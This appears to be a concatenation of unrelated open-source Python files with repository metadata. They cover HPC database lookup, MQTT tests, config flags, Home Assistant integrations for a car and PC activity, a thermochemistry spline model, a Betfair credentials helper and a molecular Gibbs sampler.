for line in lines:
content = line.split()
if "IPADDRESS:" in content:
ip = content[-1]
break
# suppress error
except FileNotFoundError:
pass
logger.debug("Waiting for RedisIP files to populate...")
if not ip:
# Larger sleep time, as this seems to be needed for
# multihost setups
time.sleep(5)
trials -= 1
if not ip:
logger.error("RedisIP address lookup strategy failed.")
raise SmartSimError("Failed to obtain database hostname")
ips.append(ip)
else:
filepath = osp.join(self.path, self.name + ".out")
trials = 5
ips = []
while len(ips) < len(self._shard_ids) and trials > 0:
ips = []
try:
with open(filepath, "r") as f:
lines = f.readlines()
for line in lines:
content = line.split()
if "IPADDRESS:" in content:
ip = content[-1]
ips.append(ip)
# suppress error
except FileNotFoundError:
pass
logger.debug("Waiting for RedisIP files to populate...")
if len(ips) < len(self._shard_ids):
# Larger sleep time, as this seems to be needed for
# multihost setups
time.sleep(5)
trials -= 1
if len(ips) < len(self._shard_ids):
logger.error("RedisIP address lookup strategy failed.")
raise SmartSimError("Failed to obtain database hostname")
ips = list(dict.fromkeys(ips))
return ips
| 1.492188 | 1 |
tests/test_mqtt/test_retain.py | DerOetzi/HABApp | 44 | 12760258 | <filename>tests/test_mqtt/test_retain.py
from HABApp.core import Items
from HABApp.mqtt.mqtt_connection import process_msg
class MqttDummyMsg:
def __init__(self, topic='', payload='', retain=False):
self.topic = topic
self._topic = topic.encode('utf-8')
self.payload = payload.encode('utf-8')
self.retain = retain
self.qos = 0
def test_retain_create():
topic = '/test/creation'
assert not Items.item_exists(topic)
process_msg(None, None, MqttDummyMsg(topic, 'aaa', retain=False))
assert not Items.item_exists(topic)
# Retain True will create the item
process_msg(None, None, MqttDummyMsg(topic, 'adsf123', retain=True))
assert Items.item_exists(topic)
assert Items.get_item(topic).value == 'adsf123'
Items.pop_item(topic)
| 2.53125 | 3 |
src/floor_estimation_fusion_project/main/flags_global.py | h4vlik/TF2_OD_BRE | 0 | 12760259 | """
Global variables for all scripts and parts of project.
"""
from absl import flags
import os
# Flag names are globally defined! So in general, we need to be
# careful to pick names that are unlikely to be used by other libraries.
# If there is a conflict, we'll get an error at import time.
"""
flags.DEFINE_string('name', '<NAME>', 'Your name.')
flags.DEFINE_integer('age', None, 'Your age in years.', lower_bound=0)
flags.DEFINE_boolean('debug', False, 'Produces debugging output.')
flags.DEFINE_enum('job', 'running', ['running', 'stopped'], 'Job status.')
"""
flags.DEFINE_string('f', '', 'kernel') # workaround due to JupyterNotebook
#####
# define main directory path
#####
flags.DEFINE_string(
'main_dir_path',
os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),
'PATH to main folder path (TF_OD_BRE folder)')
#####
# CAMERA FLAGS START
# common
flags.DEFINE_enum('image_input_mode', 'folder', ['camera', 'video', 'folder'], 'Source of image data.')
# image_feed_camera
flags.DEFINE_integer('camera_device_used', 0, 'An index of the used camera device', lower_bound=0)
# image_feed_camera
flags.DEFINE_string('image_input_folder_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\test_images_elevator_control_panel",
'PATH to the folder with images, images passed recursively.')
# image_feed_video
flags.DEFINE_string('image_input_video_path', None, 'PATH to the folder with video, used while image_input_mode=video.')
# INPUT FEED FLAGS END
#####
# ELEVATOR CONTROLS DETECTION FLAGS START
# elevator element detection
flags.DEFINE_string('detector_elements_model_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\output\saved_model",
'PATH to a SavedModel file capable of detection of elevator elements.')
flags.DEFINE_enum('detection_elements_model_type', 'tf2',
['tf2', 'reserved'], 'Type of detection model used - RESERVED.')
flags.DEFINE_string('label_map_path_detection',
r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\output\pascal_label_map.pbtxt",
'PATH to the label_map.txt | label_map.pbtxt file for detection.')
# floor button classification
flags.DEFINE_string('classification_floor_button_model_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\button_classifier",
'PATH to a SavedModel file capable of classification of elevator floor buttons.')
flags.DEFINE_enum('classification_floor_button_model_type', 'keras',
['keras', 'reserved'], 'Type of classification model used - RESERVED.')
# ELEVATOR CONTROLS DETECTION FLAGS END
#####
FLAGS = flags.FLAGS
| 2.109375 | 2 |
cookies/run_test.py | nikicc/anaconda-recipes | 130 | 12760260 | # new cookies.py
from cookies import Cookies, Cookie
cookies = Cookies(rocky='road')
# Can also write explicitly: cookies['rocky'] = Cookie['road']
cookies['rocky'].path = "/cookie"
assert cookies.render_request() == 'rocky=road'
| 2.34375 | 2 |
kallisticore/utils/singleton.py | jpmorganchase/kallisti-core | 1 | 12760261 | import inspect
class Singleton(type):
# _instances is organized first by class and then by arguments.
# for a class with:
# class Foo:
# def __init__(self, a, b):
# pass
# The _instances can look like:
# { Foo :
# {dict_items([('self', None), ('a', 1), ('b', 0)]): foo_instance1},
# {dict_items([('self', None), ('a', 1), ('b', 2)]): foo_instance2}}
#
_instances = {}
def __call__(cls, *args, **kwargs):
insts_by_args = cls._instances.setdefault(cls, {})
call_args = inspect.getcallargs(cls.__init__, None, *args, **kwargs)
items = tuple((k, v) for k, v in call_args.items() if v)
key = frozenset(items)
inst = insts_by_args.get(key)
if not inst:
inst = super(Singleton, cls).__call__(*args, **kwargs)
insts_by_args[key] = inst
return inst
| 3.265625 | 3 |
extended_libs/masternode_count.py | jhodges10/slack-dash-vote-check | 0 | 12760262 | <gh_stars>0
import requests
import json
def get_mn_count():
mn_url = "https://stats.masternode.me/network-report/latest/json"
try:
response = requests.request("GET", mn_url)
if response.status_code is not 200:
mn_count = 4700
else:
network_stats = json.loads(response.text)['formatted']
mn_count = str(network_stats['f_mn_count']).replace(',', '')
except:
mn_count = 4700
return mn_count
| 2.953125 | 3 |
pgradd/ThermoChem/raw_data.py | VlachosGroup/PythonGroupAdditivity | 2 | 12760263 | <gh_stars>1-10
import numpy as np
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.integrate import quad as integrate
from .. import yaml_io
from .base import ThermochemBase
from ..Units import eval_qty
# from ..Consts import GAS_CONSTANT as R
import pmutt as pmutt
R = pmutt.constants.R(units='J/mol/K')
# R is now sourced from pmutt.constants instead of Consts
class ThermochemRawData(ThermochemBase):
"""
Implement a thermochemical property correlation from raw data.
Evaluated quantities are interpolated using a B-spline as discussed in
:ref:`correlations documentation <correlations>`.
"""
def __init__(self, ND_H_ref, ND_S_ref, Ts, ND_Cps,
T_ref=pmutt.constants.T0(units='K'), range=None):
"""
Initialize a thermochemical property correlation from raw data.
Parameters
----------
ND_H_ref : float
Non-dimensional standard heat of formation |eq_ND_H_ref|
ND_S_ref : float
Non-dimensional standard state reference entropy |eq_ND_S_ref|
Ts : float array
Temperatures at which `ND_Cps` are evaluated.
ND_Cps : float
Non-dimensional standard state heat capacities |eq_ND_Cp_T|
evaluated at each temperature in `Ts`.
T_ref : float, optional
Reference temperature |eq_Tref| for `ND_H_ref` and `ND_S_ref`
(default: room temperature according to pmutt, likely 298.15K).
range : tuple(float, float), optional
``(lb, ub) = range`` where lb and ub are respectively the lower and
uppers bounds of temperatures [K] for which the correlation is
valid. If specified, this range must contain T_ref and all data
points in ND_Cp.
"""
(self.Ts, self.ND_Cps) = list(zip(*sorted(
zip(Ts, ND_Cps), key=lambda T_ND_Cps: T_ND_Cps[0])))
self.min_T = Ts[0]
self.max_T = Ts[-1]
if range is None:
range = (self.min_T, self.max_T)
else:
if self.min_T < range[0] or self.max_T > range[1]:
raise ValueError(
'Heat capacity data points %g or %g lie outside of range'
' [%g,%g].' % (self.min_T, self.max_T, range[0], range[1]))
if T_ref < range[0] or T_ref > range[1]:
raise ValueError(
'T_ref=%g is outside the valid correlation range [%g,%g].'
% (T_ref, range[0], range[1]))
ThermochemBase.__init__(self, range)
self.min_ND_Cp = self.ND_Cps[0]
self.max_ND_Cp = self.ND_Cps[-1]
self.ND_H_ref = ND_H_ref
self.ND_S_ref = ND_S_ref
self.T_ref = T_ref
N = len(self.Ts)
if N == 1:
self.spline = ConstantSpline(self.ND_Cps[0])
else:
self.spline = InterpolatedUnivariateSpline(
self.Ts, self.ND_Cps, k=(3 if N > 3 else N - 1))
def get_CpoR(self, T):
"""Return non-dimensional standard state heat capacity |eq_ND_Cp_T|."""
self.check_range(T)
if not np.isscalar(T):
return self._get_CpoR_ar(T)
if T < self.min_T:
return self.min_ND_Cp
if T > self.max_T:
return self.max_ND_Cp
# Work-around for SciPy bug (?):
# return self.spline(T)
return float(self.spline(T))
def _get_CpoR_ar(self, T):
ND_Cp = np.empty(T.shape)
T_below = T < self.min_T
T_above = T > self.max_T
T_middle = np.logical_not(np.logical_or(T_below, T_above))
ND_Cp[T_below] = self.min_ND_Cp
ND_Cp[T_above] = self.max_ND_Cp
ND_Cp[T_middle] = self.spline(T[T_middle])
return ND_Cp
def get_SoR(self, T):
"""Return non-dimensional standard state entropy |eq_ND_S_T|."""
self.check_range(T)
T_a = self.T_ref
T_b = T
min_T = self.min_T
max_T = self.max_T
ND_S = self.ND_S_ref
if T_a <= min_T:
if T_b <= min_T:
return ND_S + self.min_ND_Cp*np.log(T_b/T_a)
ND_S += self.min_ND_Cp*np.log(min_T/T_a)
T_a = min_T
elif T_b <= min_T:
ND_S += self.min_ND_Cp*np.log(T_b/min_T)
T_b = min_T
if T_a >= max_T:
if T_b >= max_T:
return ND_S + self.max_ND_Cp*np.log(T_b/T_a)
ND_S += self.max_ND_Cp*np.log(max_T/T_a)
T_a = max_T
elif T_b >= max_T:
ND_S += self.max_ND_Cp*np.log(T_b/max_T)
T_b = max_T
# The easiest, albeit not necessarily the best thing to do here is to
# use numerical integration, so that's what we do.
return ND_S + integrate(lambda t: self.spline(t)/t, T_a, T_b)[0]
def get_HoRT(self, T):
"""Return non-dimensional standard heat of formation |eq_ND_H_T|."""
self.check_range(T)
T_a = self.T_ref
T_b = T
min_T = self.min_T
max_T = self.max_T
# This value represents the accumulated H/R (has temperature units).
rH = self.ND_H_ref*T_a
if T_a <= min_T:
if T_b <= min_T:
return (rH + self.min_ND_Cp*(T_b - T_a))/T
rH += self.min_ND_Cp*(min_T - T_a)
T_a = min_T
elif T_b <= min_T:
rH += self.min_ND_Cp*(T_b - min_T)
T_b = min_T
if T_a >= max_T:
if T_b >= max_T:
return rH + self.max_ND_Cp*(T_b - T_a)/T
rH += self.max_ND_Cp*(max_T - T_a)
T_a = max_T
elif T_b >= max_T:
rH += self.max_ND_Cp*(T_b - max_T)
T_b = max_T
return (rH + self.spline.integral(T_a, T_b))/T
@classmethod
def yaml_construct(cls, params, context):
if 'T_ref' in params:
T_ref = params['T_ref']
else:
#T_ref = eval_qty('298.15 K') #fixed from eval_qty(298.15, 'K')
T_ref = pmutt.constants.T0(units='K')
#replaced getting room temp (298K) from eval_qty to pmutt.constants
if 'ND_H_ref' in params:
ND_H_ref = params['ND_H_ref']
else:
ND_H_ref = params['H_ref']/(R*T_ref)
if 'ND_S_ref' in params:
ND_S_ref = params['ND_S_ref']
else:
ND_S_ref = params['S_ref']/R
if 'ND_Cp_data' in params:
T_data, ND_Cp_data = list(zip(*params['ND_Cp_data']))
Ts = np.array([T.in_units('K') for T in T_data])
ND_Cps = np.array(ND_Cp_data)
else:
T_data, Cp_data = list(zip(*params['Cp_data']))
Ts = np.array([T.in_units('K') for T in T_data])
ND_Cps = np.array(
[Cp for Cp in Cp_data])/R
range = params.get('range')
if range is not None:
range = range[0].in_units('K'), range[1].in_units('K')
else:
range = Ts.min(), Ts.max()
return cls(ND_H_ref, ND_S_ref, Ts, ND_Cps, T_ref.in_units('K'), range)
_yaml_schema = """
range:
type: tuple
item_types: [{type: qty, kind: temperature},
{type: qty, kind: temperature}]
optional: True
desc: range of valid temperatures
T_ref:
type: qty
kind: temperature
default: 298.15 K
desc: reference temperature for reference enthalpy and entropy
ND_Cp_data:
type: list
item_type:
type: tuple
item_types:
- type: qty
kind: temperature
- type: float
alts: Cp_data
desc: set of (T, Cp(T)/R) data point pairs, where R is the gas constant
ND_H_ref:
type: float
alts: H_ref
desc: H_ref/(R*T_ref) where R is the gas constant
ND_S_ref:
type: float
alts: ND_S_ref
desc: S_ref/R where R is the gas constant
Cp_data:
type: list
item_type:
type: tuple
item_types:
- type: qty
kind: temperature
- type: qty
kind: molar heat capacity
alts: ND_Cp_data
desc: set of (T, Cp(T)) data point pairs
H_ref:
type: qty
kind: molar enthalpy
alts: ND_H_ref
desc: reference enthalpy
S_ref:
type: qty
kind: molar entropy
alts: ND_S_ref
desc: reference entropy
"""
yaml_io.register_class('ThermochemRawData',
yaml_io.parse(ThermochemRawData._yaml_schema),
ThermochemRawData)
class ConstantSpline(object):
# This class emulates the interface to UnivariateSpline in the case of a
# single data point (no interpolation).
def __init__(self, ND_Cp):
self.ND_Cp = ND_Cp
def __call__(self, Ts):
return self.ND_Cp*np.ones_like(Ts)
def integral(self, T_a, T_b):
return self.ND_Cp*(T_b - T_a)
__all__ = ['ThermochemRawData']
| 2.046875 | 2 |
betfair_scraper/__init__.py | meister245/betfair-scraper | 2 | 12760264 | import os
import getpass
from .scraper import BetfairScraper as Betfair
__version__ = '1.0'
SECRETS_DIR = os.path.expanduser('~') + '/.betfair/'
SECRETS_FILE = SECRETS_DIR + 'secrets'
if not os.path.isdir(SECRETS_DIR):
os.mkdir(SECRETS_DIR)
if not os.path.isfile(SECRETS_FILE):
with open(SECRETS_FILE, 'w'):
pass
def get_secrets(name: str) -> tuple:
with open(SECRETS_FILE, 'r') as f:
for row in (x for x in f.read().split('\n') if len(x.strip()) > 0):
username, password = row.split()
if username == name:
return username, password
username, password = '', ''
while not password:
password = getpass.getpass(f'{name} - password: ')
with open(SECRETS_FILE, 'a') as f:
f.write(f'{name} {password}\n')
return username, password
| 2.546875 | 3 |
code/automate.py | jayantsolanki/Proj-4-Introduction-to-Deep-Learning-IntroToML-574 | 0 | 12760265 | <filename>code/automate.py
#automate.py
#This script is used for hypertuning the model parameters
import numpy as np
from main import *
for i in np.arange(0.3,0.6,0.1):
print(" For dropout %.2f"%(i))
print("32 64")
main(i, 32, 64)
print("64 128")
main(i, 64, 128)
print("128 256")
main(i, 128, 256)
# for j in np.arange(32,49,8):
# for k in np.arange(64,81,8): | 2.671875 | 3 |
custom_components/renault/services.py | Giancky79/hassRenaultZE | 35 | 12760266 | """Support for Renault services."""
import logging
from typing import Any, Dict
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import HomeAssistantType
from renault_api.kamereon.exceptions import KamereonResponseException
import voluptuous as vol
from .const import DOMAIN, REGEX_VIN
from .renault_hub import RenaultHub
from .renault_vehicle import RenaultVehicleProxy
_LOGGER = logging.getLogger(__name__)
RENAULT_SERVICES = "renault_services"
SCHEMA_CHARGE_MODE = "charge_mode"
SCHEMA_SCHEDULES = "schedules"
SCHEMA_TEMPERATURE = "temperature"
SCHEMA_VIN = "vin"
SCHEMA_WHEN = "when"
SERVICE_AC_CANCEL = "ac_cancel"
SERVICE_AC_CANCEL_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
}
)
SERVICE_AC_START = "ac_start"
SERVICE_AC_START_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Optional(SCHEMA_WHEN): cv.datetime,
vol.Optional(SCHEMA_TEMPERATURE): cv.positive_int,
}
)
SERVICE_CHARGE_SET_MODE = "charge_set_mode"
SERVICE_CHARGE_SET_MODE_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Required(SCHEMA_CHARGE_MODE): cv.string,
}
)
SERVICE_CHARGE_SET_SCHEDULES = "charge_set_schedules"
SERVICE_CHARGE_SET_SCHEDULES_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Required(SCHEMA_SCHEDULES): dict,
}
)
SERVICE_CHARGE_START = "charge_start"
SERVICE_CHARGE_START_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
}
)
async def async_setup_services(hass: HomeAssistantType) -> None:
"""Register the Renault services."""
_LOGGER.debug("Registering renault services")
if hass.data.get(RENAULT_SERVICES, False):
return
hass.data[RENAULT_SERVICES] = True
async def ac_start(service_call) -> None:
"""Start A/C."""
service_call_data: Dict[str, Any] = service_call.data
when = service_call_data.get(SCHEMA_WHEN, None)
temperature = service_call_data.get(SCHEMA_TEMPERATURE, 21)
vehicle = get_vehicle(service_call_data)
_LOGGER.debug("A/C start attempt: %s / %s", when, temperature)
try:
result = await vehicle.send_ac_start(temperature=temperature, when=when)
except KamereonResponseException as err:
_LOGGER.error("A/C start failed: %s", err)
else:
_LOGGER.info("A/C start result: %s", result.raw_data)
async def ac_cancel(service_call) -> None:
"""Cancel A/C."""
service_call_data: Dict[str, Any] = service_call.data
vehicle = get_vehicle(service_call_data)
_LOGGER.debug("A/C cancel attempt.")
try:
result = await vehicle.send_cancel_ac()
except KamereonResponseException as err:
_LOGGER.error("A/C cancel failed: %s", err)
else:
_LOGGER.info("A/C cancel result: %s", result)
async def charge_set_mode(service_call) -> None:
"""Set charge mode."""
service_call_data: Dict[str, Any] = service_call.data
charge_mode: str = service_call_data[SCHEMA_CHARGE_MODE]
vehicle = get_vehicle(service_call_data)
_LOGGER.debug("Charge set mode attempt: %s", charge_mode)
try:
# there was some confusion in earlier release regarding upper or lower case of charge-mode
# so forcing to lower manually for the custom-component (always or always_charging or schedule_mode)
result = await vehicle.send_set_charge_mode(charge_mode.lower())
except KamereonResponseException as err:
_LOGGER.error("Charge set mode failed: %s", err)
else:
_LOGGER.info("Charge set mode result: %s", result)
async def charge_start(service_call) -> None:
"""Start charge."""
service_call_data: Dict[str, Any] = service_call.data
vehicle = get_vehicle(service_call_data)
_LOGGER.debug("Charge start attempt.")
try:
result = await vehicle.send_charge_start()
except KamereonResponseException as err:
_LOGGER.error("Charge start failed: %s", err)
else:
_LOGGER.info("Charge start result: %s", result)
async def charge_set_schedules(service_call) -> None:
"""Set charge schedules."""
service_call_data: Dict[str, Any] = service_call.data
schedules = service_call_data.get(SCHEMA_SCHEDULES)
vehicle = get_vehicle(service_call_data)
charge_schedules = await vehicle.get_charging_settings()
charge_schedules.update(schedules)
try:
_LOGGER.debug("Charge set schedules attempt: %s", schedules)
result = await vehicle.send_set_charge_schedules(charge_schedules)
except KamereonResponseException as err:
_LOGGER.error("Charge set schedules failed: %s", err)
else:
_LOGGER.info("Charge set schedules result: %s", result)
_LOGGER.info(
"It may take some time before these changes are reflected in your vehicle."
)
def get_vehicle(service_call_data: Dict[str, Any]) -> RenaultVehicleProxy:
"""Get vehicle from service_call data."""
vin: str = service_call_data[SCHEMA_VIN]
proxy: RenaultHub
for proxy in hass.data[DOMAIN].values():
# there was some confusion in earlier release regarding upper or lower case of vin
# so forcing to upper manually for the custom-component
vehicle = proxy.vehicles.get(vin.upper())
if vehicle is not None:
return vehicle
raise ValueError(f"Unable to find vehicle with VIN: {vin}")
hass.services.async_register(
DOMAIN,
SERVICE_AC_START,
ac_start,
schema=SERVICE_AC_START_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_AC_CANCEL,
ac_cancel,
schema=SERVICE_AC_CANCEL_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_CHARGE_START,
charge_start,
schema=SERVICE_CHARGE_START_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_CHARGE_SET_MODE,
charge_set_mode,
schema=SERVICE_CHARGE_SET_MODE_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_CHARGE_SET_SCHEDULES,
charge_set_schedules,
schema=SERVICE_CHARGE_SET_SCHEDULES_SCHEMA,
)
async def async_unload_services(hass: HomeAssistantType) -> None:
"""Unload Renault services."""
if not hass.data.get(RENAULT_SERVICES):
return
hass.data[RENAULT_SERVICES] = False
hass.services.async_remove(DOMAIN, SERVICE_AC_CANCEL)
hass.services.async_remove(DOMAIN, SERVICE_AC_START)
hass.services.async_remove(DOMAIN, SERVICE_CHARGE_SET_MODE)
hass.services.async_remove(DOMAIN, SERVICE_CHARGE_SET_SCHEDULES)
hass.services.async_remove(DOMAIN, SERVICE_CHARGE_START)
| 2.140625 | 2 |
main.py | TheLastGimbus/hass-pc-usage-detection | 6 | 12760267 | <filename>main.py
"""
Created by @TheLastGimbus
This script reports to Home Assistant when you use/don't use your PC - in a high-level meaning
So not bear nmap or ping - *actually* estimating whether you are *actively* using this PC or not
For now, it detects whether you touch your keyboard or mouse, but in future, it could also detect
if you are watching movie or something
"""
import argparse
from time import sleep
from time import time
import pynput
import requests as re
parser = argparse.ArgumentParser(
description='Script to monitor if you touch your PC and report it to HASS'
)
parser.add_argument(
'-u', '--url', required=True,
help='URL to HASS HTTP binary sensor. '
'Example: http://IP_ADDRESS:8123/api/states/binary_sensor.DEVICE_NAME'
)
parser.add_argument('--keyboard', action='store_true', help='Whether to monitor keyboard')
parser.add_argument('--mouse', action='store_true', help='Whether to monitor mouse')
parser.add_argument(
'-t', '--time', type=int, default=180,
help='How many seconds must pass to report PC as not used - defaults to 3 minutes'
)
parser.add_argument('--token', type=str, required=True, help="HASS long-lived access token")
args = parser.parse_args()
last_interaction = 0
def on_interaction(*shit):
global last_interaction
last_interaction = time()
if args.mouse:
mouse_listener = pynput.mouse.Listener(
on_move=on_interaction,
on_click=on_interaction,
on_scroll=on_interaction,
)
mouse_listener.start()
if args.keyboard:
keyboard_listener = pynput.keyboard.Listener(
on_press=on_interaction,
on_release=on_interaction,
)
keyboard_listener.start()
session = re.session()
session.headers["Authorization"] = f"Bearer {args.token}"
session.headers["Content-Type"] = "application/json"
active = True
last_report = 0
while True:
last_state = active
active = time() - last_interaction < args.time
# If it's different than last state OR last report was 5 minutes ago
# print(active)
if last_state != active or time() - last_report > 300:
if active:
state = 'on'
else:
state = 'off'
print(f"Reporting {state}")
try:
res = session.post(args.url, json={"state": state, "attributes": {}}, timeout=10)
if not res.ok:
raise IOError(f"Response is not ok! Code: {res.status_code} Content: {res.content.decode('utf-8')}")
print(f"Report ok :) Response: {res.content.decode('utf-8')}")
last_report = time()
except Exception as e:
print(f"Can't connect: {e}")
sleep(5)
# If not this, the script will use 100% cpu xD
sleep(0.1)
| 3.0625 | 3 |
src/rest/endpoint.py | leolani/cltl-demo-component | 0 | 12760268 | <reponame>leolani/cltl-demo-component<filename>src/rest/endpoint.py
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.yaml_utils import load_yaml_from_docstring
from marshmallow_dataclass import class_schema
from cltl.demo.api import ExampleOutput, ExampleInput
from cltl.demo.implementation import DummyExampleComponent
class OpenAPISpec:
def __init__(self, *args, **kwargs):
self.spec = APISpec(*args, **kwargs)
@property
def to_yaml(self):
return self.spec.to_yaml()
@property
def to_dict(self):
return self.spec.to_dict()
@property
def components(self):
return self.spec.components
def path(self, path):
def wrapped(func):
self.spec.path(path,
description=func.__doc__.partition('\n')[0],
operations=load_yaml_from_docstring(func.__doc__))
return func
return wrapped
api = OpenAPISpec(title="Template",
version="0.0.1",
openapi_version="3.0.2",
info=dict(description="Leolani component template"),
plugins=[MarshmallowPlugin()], )
api.components.schema("ExampleInput", schema=class_schema(ExampleInput))
api.components.schema("ExampleOutput", schema=class_schema(ExampleOutput))
@api.path("/template/api/foo/bar")
def foo_bar(input):
"""Short Description included in OpenAPI spec
A longer description can go here.
The yaml snippet below is included in the OpenAPI spec for the endpoint:
---
get:
operationId: rest.endpoint.foo_bar
responses:
'200':
content:
application/json:
schema:
$ref: '#/components/schemas/ExampleOutput'
description: Get foo bars
parameters:
- in: query
name: times
schema:
$ref: '#/components/schemas/ExampleInput'
"""
return DummyExampleComponent().foo_bar(input)
if __name__ == '__main__':
with open("template_spec.yaml", "w") as f:
f.write(api.to_yaml())
| 2.03125 | 2 |
tests/legacy/test_utils.py | NeoLight1010/strawberry-graphql-django | 18 | 12760269 | from strawberry_django.legacy import utils
def test_basic_filters():
filter, exclude = utils.process_filters(['id__gt=5', 'name="you"', 'name__contains!="me"'])
assert filter == { 'id__gt': 5, 'name': 'you' }
assert exclude == { 'name__contains': 'me' }
def test_is_in_filter():
filter, exclude = utils.process_filters(['id__in=[1, 2, 3]', 'group__in!=["a", "b", "x y z"]'])
assert filter == { 'id__in': [1, 2, 3] }
assert exclude == { 'group__in': ['a', 'b', 'x y z'] }
| 2.28125 | 2 |
code/genric/deploy/chain.py | wendazhou/reversible-inductive-construction | 31 | 12760270 | import argparse
import numpy as np
import time
from datetime import datetime
import os
from copy import deepcopy
import functools
import typing
import pickle
from .. import Chem
from .. import chemutils
import rdkit
from rdkit.Chem import Draw
import rdkit.RDLogger
import torch
from ..chemutils import get_mol, get_smiles, get_smiles_2D
from .. import vocabulary
from .. import data_utils
from .. import action, molecule_representation as mr, model as mo
from .. import molecule_edit as me
from ..molecule_models import joint_network
from ..molecule_models import action_representation as ar
from ..molecule_models._train_utils import replace_sparse_tensor, load_cuda_async, cast_numpy_to_torch
from ._data import SampleResult
SIZE_CAP = 25
class GibbsSampler:
"""Runs a Gibbs chain that alternates between a provided corruption distribution and reconstruction model.
"""
def __init__(self, model, expected_corruption_steps=5, action_encoder=None, device=None):
"""
Parameters
----------
model: a Pytorch network that takes as input a molecular graph (x_tilde) and returns logits
over all possible actions.`
expected_corruption_steps: the expected length of the corruption sequence,
used to determine the geometric distribution parameter.
action_encoder: used to specify the vocab size and possible actions
(of default type action_representation.VocabInsertEncoder)
"""
self.model = model
self.expected_corruption_steps = expected_corruption_steps
self.vocab = vocabulary.Vocabulary()
if action_encoder is None:
action_encoder = ar.VocabInsertEncoder(canonical=True)
self.action_encoder = action_encoder
self.device = device
def corrupter(self, mol, rng=np.random, return_seq=False):
"""Corrupts the input (of type rdkit Mol) via the default random insert & delete operations in molecule_edit.py.
"""
seq = [mol]
acts = []
ori_mol = deepcopy(mol)
number_of_steps = rng.geometric(1 / (1 + self.expected_corruption_steps)) - 1
for _ in range(number_of_steps):
if rng.uniform() < 0.5 and len(me.get_leaves(mol)) >= 2:
mol, this_act = me.delete_random_leaf(mol, rng=rng, return_action=True)
else:
mol, this_act = me.insert_random_node(mol, self.vocab, rng=rng, return_action=True)
seq.append(mol)
acts.append(this_act)
# Size cap
if mol.GetNumAtoms() > SIZE_CAP:
return self.corrupter(ori_mol, rng=rng, return_seq=return_seq)
# Avoid splits (rare)
if '.' in get_smiles_2D(mol):
return self.corrupter(ori_mol, rng=rng, return_seq=return_seq)
if not return_seq:
return mol
else:
return mol, seq
def _reconstruct_single_step(self, x_tilde):
""" Runs a single step of the reconstruction process.
Parameters
----------
x_tilde: the input molecule to the reconstructor
Returns
-------
A tuple of two elements.
mol: Either the one-step action applied to the denoiser, if it was valid,
or None if the sampled actions were invalid.
act: The action that was sampled for the molecule.
"""
x_tilde_graph = mr.combine_mol_graph(
[mr.mol2graph_single(x_tilde, include_leaves=True, include_rings=True, normalization='sqrt')],
return_namedtuple=True,
cast_tensor=cast_numpy_to_torch)
x_tilde_graph = load_cuda_async(x_tilde_graph, device=self.device)
x_tilde_graph = mr.GraphInfo.from_sequence(x_tilde_graph)
x_tilde_graph = replace_sparse_tensor(x_tilde_graph)
logits_and_scopes = self.model(x_tilde_graph)
predictions, cand_act_idxs = mo.classification.multi_classification_prediction(
logits_and_scopes, predict=True, num_samples=5)
for i, act_idx in enumerate(cand_act_idxs.cpu()[0]):
act_idx = act_idx.item()
# Get corresponding action object and try executing it
lengths = ar.compute_action_lengths(x_tilde, self.action_encoder)
act = ar.integer_to_action(act_idx, lengths, self.action_encoder)
try:
result = me.compute_action(x_tilde, act, vocab=self.vocab)
break
except ValueError:
pass
else:
# No valid action sampled.
result = None
return result, act
def reconstruct(self, actual_x_tilde, return_seq=False):
""" Runs the reconstructor on the given molecule.
Parameters
----------
actual_x_tilde: the corrupted molecule
return_seq: if True, returns the denoising sequence, otherwise,
only return the last denoised value.
"""
# Reconstruct
x = None
if return_seq:
seq = [actual_x_tilde]
x_tilde = deepcopy(actual_x_tilde)
num_steps_taken = 0
visited_smiles = {get_smiles_2D(actual_x_tilde): 0}
is_revisit = False
while True:
x_tilde, act = self._reconstruct_single_step(x_tilde)
if x_tilde is None:
print('Did not sample valid action. Returning to previous mol.')
break
num_steps_taken += 1
this_smiles = get_smiles_2D(x_tilde)
is_revisit = False
if this_smiles in visited_smiles:
# print('Revisited on step %i' % visited_smiles[this_smiles])
is_revisit = True
else:
visited_smiles[this_smiles] = num_steps_taken
if is_revisit or isinstance(act, action.Stop):
if x_tilde.GetNumAtoms() > SIZE_CAP:
# print('Mol too large. Returning to previous mol.')
pass
elif '.' in get_smiles_2D(x_tilde):
# Avoid splits (rare). Leaving this as return to previous
# print('Broke mol. Returning to previous mol.')
pass
else:
x = x_tilde
break
if not return_seq:
return x, num_steps_taken, is_revisit
else:
return x, seq, num_steps_taken, is_revisit
def _apply_corrupter(self, x, rng, check_substructure):
while True:
try:
actual_x_tilde, seq = self.corrupter(x, rng=rng, return_seq=True)
if check_substructure(actual_x_tilde):
break
except ValueError:
print('Corruption failed. Retrying corruption.')
pass
return actual_x_tilde, len(seq)
def run_chain(self, init_smiles=None, num_transitions=1000, sample_freq=1, seed=None, substructure=None):
"""
Parameters
----------
init_smiles: the SMILES string with which to initialize the chain.
If not provided, a random string from the ZINC validation set will be used.
num_transitions: total number of chain transitions to run.
sample_freq: frequency to print chain's state.
seed: seed for numpy.random.
"""
if not seed:
seed = np.random.randint(2**31 - 1)
rng = np.random.RandomState(seed)
torch.manual_seed(seed)
